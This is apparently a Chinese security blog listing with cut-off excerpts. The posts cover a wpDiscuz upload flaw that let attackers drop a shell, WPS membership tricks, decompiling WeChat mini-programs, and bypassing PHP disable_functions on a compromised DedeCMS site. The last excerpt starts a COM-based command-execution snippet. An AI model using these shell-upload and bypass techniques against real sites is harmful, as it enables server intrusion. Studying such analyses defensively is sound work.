该文章转自先知社区ninefighter :https://xz.aliyun.com/t/8138 前言 在t00ls上看到一个老哥wordpress站点被搞了,下载了access日志分析了一下,发现攻击路径是先访问了一个页面,然后访问 /wp-admin/admin-ajax.php?action=wmuUploadFiles 后直接就shell落地了,确定是这个模块有问题了;后来说是wpdiscuz评论插件的漏洞,看了下官网V7.0.5修复了一次安全漏洞,于是下载V7.0.3版本学习一下(7.0.4没找到)。…
利用微信机器人领WPS会员稻壳会员 WPS是我一直在用的一款办公软件,因为WPS网盘能够同步文档,而且做流程图找PPT模板都很方便。 但是普通用户的权限非常小,而WPS会员可以关闭广告享有1G云盘文档同步,稻壳会员可以免费下载海量模板。 在网上搜集了很多资料,发现了两个关于WPS的官方活动,分别可以领取WPS会员和稻壳会员。 在微信小程序分别搜索 我的WPS会员 和 WPS稻壳会员,如下图所示 通过在这两款小程序里进行签到,就可以每天领一天会员。 WPS会员每天领11+天 当然每天领一天会员并不能满足我,在我的WP…
反编译小程序 因为最近有需要从小程序里提取接口,这里搜集了下资料便开始反编译小程序,也经过了不少波折。 这里我一开始利用的是电脑版微信的小程序,打开微信设置-文件管理-打开文件夹 打开后返回上层目录到Applet目录下,这个目录下是电脑版微信小程序的存放目录 D:\Users\Mr.D\WeChat\WeChat Files\Applet\ 因为有多个小程序而且无法识别哪个是需要反编译的小程序,这里先把所有文件夹全部删除掉,然后再次在微信里打开小程序就会再次自动生成,然后目录变成了下面这个样子。 这个wx开头的文件…
一个dede的站shell,看了下 disable_functions exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod,escapeshellarg,escapeshellcmd,sh2_exec,proc_terminate,proc_close 而且也不支持pcntl_exec函数,MySQL低权限用户,尝试COM组件 <?php $command=$_GET['a']; $wsh = new COM(&#…
